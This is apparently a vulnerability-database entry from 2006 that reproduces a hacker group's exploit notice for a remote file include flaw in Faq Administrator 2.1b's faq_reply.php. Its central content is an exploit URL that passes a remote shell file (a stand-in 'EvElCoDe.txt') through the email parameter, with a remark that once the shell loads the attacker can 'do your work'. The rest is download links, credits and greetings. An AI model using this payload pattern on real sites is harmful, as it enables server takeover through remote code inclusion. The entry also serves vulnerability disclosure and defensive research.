Faq Administrator 2.1 (faq_reply.php) Remote File Include Vulnerability

2006-10-30T00:00:00
ID SSV:5431
Type seebug
Reporter Root
Modified 2006-10-30T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #==================================================================
#  Faq Administrator (RFI)
#==================================================================
# Info:-
#
# Scripts:  Faq Administrator
# http://www.campbus.com/downloads/faqadmin/faqadmin-current.tgz
# Version : 2.1b
# Dork & vuln : download scripts and think :)
#Note : if the shell included stop the page and do your work :)
#==================================================================
#Exploit :
#
#http://localhost/path/faq_reply.php?email=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to :| abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |
#                 ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net |
#            metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota |
#And all members in XP10_hackEr Team
#Thanx to str0ke :)
#WWW.XP10.COM
#
#==================================================================